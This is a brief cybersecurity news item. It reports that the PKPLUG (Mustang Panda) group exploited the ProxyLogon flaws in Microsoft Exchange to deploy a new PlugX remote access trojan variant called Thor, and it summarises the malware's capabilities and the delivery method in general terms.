A Chinese cyberespionage group known for targeting leveraged flaws in the Microsoft Exchange Server that came to light earlier deploying a previously undocumented variant of a remote access trojan (RAT) on compromised systems.
Dubbed PKPLUG (Mustang Panda and HoneyMyte), Researches identified a new version of the modular PlugX malware, called Thor, that was delivered as a post-exploitation tool to one of the breached servers.
PlugX is a fully-featured second-stage implant with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote command shell.
After Microsoft disclosed that China-based hackers Hafnium were exploiting zero-day bugs in Exchange server collectively known as ProxyLogon to steal sensitive data from select targets, multiple threat actors, such as ransomware groups (DearCry and Black Kingdom) observed exploiting the flaws to hijack Exchange servers and install a web shell that granted code execution at the highest privilege level.
PKPLUG now joins the list,the attackers bypassing antivirus detection mechanisms to target Microsoft Exchange servers by leveraging legitimate executables such as BITSAdmin to retrieve a seemingly innocuous file (“Aro.dat”) from an actor-controlled GitHub repository. The file, which houses the encrypted and compressed PlugX payload, alludes to a freely available advanced repair and optimization tool that’s designed to clean up and fix issues in the Windows Registry.
The latest sample of PlugX comes equipped with a variety of plug-ins that “provide attackers various capabilities to monitor, update and interact with the compromised system to fulfil their objectives,” the researchers said. THOR’s links to PKPLUG stem from piecing together the command-and-control infrastructure as well as overlaps in the malicious behaviors detected among other recently discovered PlugX samples.
Additional indicators of compromise associated with the attack can be accessed here. Researchers made available a Python script that can decrypt and unpack encrypted PlugX payloads without having the associated PlugX loaders.